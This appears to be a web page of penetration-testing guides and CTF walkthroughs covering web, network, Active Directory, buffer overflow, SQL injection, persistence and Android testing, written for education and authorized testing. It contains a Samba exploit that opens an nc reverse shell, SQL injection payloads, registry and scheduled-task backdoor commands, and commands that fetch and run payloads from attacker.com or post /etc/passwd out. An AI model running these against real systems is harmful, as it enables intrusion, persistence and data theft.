📚 Security Guides & Writeups

Practical penetration testing methodologies and step-by-step security guides

🎯 Penetration Testing Methodologies

OWASP Web Application Testing Guide

Beginner Web Security

Complete step-by-step methodology for web application security testing following OWASP standards.

Testing Phases:

  1. Information Gathering
    • Conduct search engine reconnaissance
    • Fingerprint web server and technologies
    • Discover application architecture
    • Identify application entry points
  2. Configuration Testing
    • Test network/infrastructure configuration
    • Test application platform configuration
    • Test file extensions handling
    • Review backup and old files
  3. Authentication Testing
    • Test credentials transported over encrypted channel
    • Test default credentials
    • Test weak password policy
    • Test account lockout mechanism
  4. Session Management Testing
    • Test session management schema
    • Test cookies attributes
    • Test session fixation
    • Test exposed session variables
Example Commands:
# Initial reconnaissance
nmap -sS -sV -A target.com

# Directory enumeration
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# Technology fingerprinting
whatweb target.com

# SQL injection testing
sqlmap -u "http://target.com/page?id=1" --dbs

Network Penetration Testing Methodology

Intermediate Network Security

Systematic approach to network penetration testing from reconnaissance to post-exploitation.

Network Pentest Steps:

  1. Pre-Engagement
    • Define scope and rules of engagement
    • Obtain proper authorization
    • Set up testing environment
  2. Reconnaissance
    • Passive information gathering
    • Active network discovery
    • Port scanning and service enumeration
  3. Vulnerability Assessment
    • Automated vulnerability scanning
    • Manual verification of findings
    • Risk assessment and prioritization
  4. Exploitation
    • Develop and execute exploits
    • Gain initial access
    • Document proof of concept
Network Enumeration Script:
#!/bin/bash
TARGET=$1

echo "Starting network reconnaissance on $TARGET"

# Host discovery
echo "[+] Discovering live hosts..."
nmap -sn $TARGET/24

# Port scanning
echo "[+] Scanning top ports..."
nmap -sS -T4 -O -F $TARGET

# Service enumeration
echo "[+] Enumerating services..."
nmap -sV -sC -A $TARGET

echo "Reconnaissance complete!"

Active Directory Penetration Testing

Advanced Windows Security

Complete guide to testing Active Directory environments including enumeration, privilege escalation, and lateral movement.

AD Attack Chain:

  1. Initial Enumeration
    • Discover domain controllers
    • Enumerate users and groups
    • Identify service accounts
  2. Credential Attacks
    • Password spraying
    • AS-REP roasting
    • Kerberoasting
  3. Lateral Movement
    • Pass-the-Hash attacks
    • Golden/Silver tickets
    • DCSync attacks
BloodHound Enumeration:
# Run SharpHound collector
.\SharpHound.exe -c All -d domain.com

# Import data into BloodHound
# Start BloodHound and import the ZIP file

# Common queries:
# - Find shortest path to Domain Admin
# - Find computers with unconstrained delegation
# - Find users with DCSync rights

🏆 CTF Walkthroughs

HackTheBox - Lame Writeup

Beginner Linux

Step-by-step walkthrough of the classic Lame machine from HackTheBox.

Machine Information:

  • OS: Linux
  • Difficulty: Easy
  • IP: 10.10.10.3

Enumeration:

# Nmap scan
nmap -sC -sV -oA lame 10.10.10.3

# Results show:
# 21/tcp - vsftpd 2.3.4
# 22/tcp - OpenSSH 4.7p1
# 139/tcp - Samba smbd 3.0.20-Debian
# 445/tcp - Samba smbd 3.0.20-Debian

Exploitation:

The Samba version 3.0.20 is vulnerable to CVE-2007-2447 (username map script).

# Using Metasploit
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST tun0
exploit

# Manual exploitation
smbclient //10.10.10.3/tmp
logon "/=`nohup nc -e /bin/sh 10.10.14.1 4444`"

TryHackMe - Basic Pentesting Room

Beginner Mixed

Complete walkthrough of the Basic Pentesting room covering web and SMB enumeration.

Reconnaissance Phase:

# Port scanning
nmap -sC -sV -oN nmap.txt TARGET_IP

# Web enumeration
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt

# SMB enumeration
enum4linux TARGET_IP
smbclient -L //TARGET_IP -N

Key Findings:

  • Web directory /development with sensitive files
  • Anonymous SMB share with user credentials
  • SSH service for initial access
  • Privilege escalation via sudo misconfiguration

🔬 Vulnerability Research

Buffer Overflow Exploitation Guide

Advanced Binary Exploitation

Complete guide to identifying and exploiting buffer overflow vulnerabilities.

Exploitation Steps:

  1. Fuzzing - Find the crash point
  2. Controlling EIP - Identify offset
  3. Finding Bad Characters - Identify restricted bytes
  4. Finding JMP ESP - Locate reliable jump point
  5. Shellcode Generation - Create payload
  6. Exploitation - Execute the exploit
Fuzzing Script:
#!/usr/bin/python3
import socket
import sys

buffer = "A" * 100

while len(buffer) <= 4000:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("192.168.1.100", 9999))
        s.send(("TRUN /.:/" + buffer).encode())
        s.close()
        buffer = buffer + "A" * 100
    except:
        print("Fuzzing crashed at  bytes".format(len(buffer)))
        sys.exit()

SQL Injection Testing Methodology

Intermediate Web Security

Systematic approach to identifying and exploiting SQL injection vulnerabilities.

Testing Process:

  1. Parameter Identification
    • Map all input parameters
    • Test GET/POST parameters
    • Test headers and cookies
  2. Injection Testing
    • Boolean-based blind injection
    • Time-based blind injection
    • Error-based injection
    • Union-based injection
Manual Testing Payloads:
# Boolean-based
' OR '1'='1' --
' OR '1'='2' --

# Time-based
'; WAITFOR DELAY '00:00:05' --
' OR SLEEP(5) --

# Union-based
' UNION SELECT 1,2,3,4 --
' UNION SELECT @@version,2,3,4 --

# Error-based
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --

🔴 Red Team Tactics

Persistence Mechanisms

Advanced Post-Exploitation

Various techniques for maintaining persistent access to compromised systems.

Windows Persistence:

  • Registry Run Keys - Auto-start programs
  • Scheduled Tasks - Time-based execution
  • Services - Background processes
  • WMI Events - Event-triggered execution
Registry Persistence:
# Add registry key for persistence
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\temp\backdoor.exe"

# Scheduled task persistence
schtasks /create /sc onlogon /tn "SecurityUpdate" /tr "C:\temp\backdoor.exe"

# Service persistence
sc create "SecurityUpdate" binPath= "C:\temp\backdoor.exe" DisplayName= "Security Update Service"

Linux Persistence:

  • Cron Jobs - Scheduled execution
  • SSH Keys - Key-based access
  • Systemd Services - Service-based persistence
  • Bash Profile - Login-triggered execution

Living off the Land Techniques

Advanced Evasion

Using legitimate system tools and features for malicious purposes to avoid detection.

Windows LOLBAS:

# PowerShell download and execute
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://attacker.com/payload.ps1')"

# Certutil for download
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe

# BitsTransfer for stealth download
Import-Module BitsTransfer
Start-BitsTransfer -Source "http://attacker.com/payload.exe" -Destination "C:\temp\payload.exe"

# WMI for execution
wmic process call create "cmd.exe /c calc.exe"

Linux GTFOBins:

# Wget for download
wget http://attacker.com/payload.sh -O /tmp/payload.sh

# Curl for data exfiltration
curl -X POST -d @/etc/passwd http://attacker.com/exfil

# Tar for privilege escalation
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

📱 Mobile Security Testing

Android Application Security Testing

Intermediate Mobile

Comprehensive guide to testing Android applications for security vulnerabilities.

Testing Environment Setup:

  1. Install Android SDK and ADB
  2. Set up Android emulator or rooted device
  3. Install security testing tools (Frida, MobSF, etc.)
Static Analysis Commands:
# APK analysis
aapt dump badging app.apk
dex2jar app.apk
jd-gui app.jar

# Certificate analysis
keytool -printcert -file META-INF/CERT.RSA

# Manifest analysis
aapt dump xmltree app.apk AndroidManifest.xml

Dynamic Analysis:

  • Runtime application analysis
  • API hooking with Frida
  • Network traffic interception
  • File system monitoring

⚠️ Ethical Use Only

All techniques and methodologies described here are for educational purposes and authorized security testing only. Unauthorized use of these techniques is illegal and unethical. Always ensure you have explicit written permission before testing any system.

🔗 Join the Community

💬

Discord Chat

Join our active cybersecurity community for real-time discussions

Join Discord Server
🔐

Matrix Room

Encrypted chat for privacy-focused security discussions

Join Matrix Room
💬

Live Chat

Join our integrated chatroom directly on the website

Enter Live Chat

Community Guidelines

  • 🛡️ Keep discussions professional and educational
  • ⚠️ No illegal activities or malicious content
  • 🤝 Be respectful to all community members
  • 📚 Share knowledge and help others learn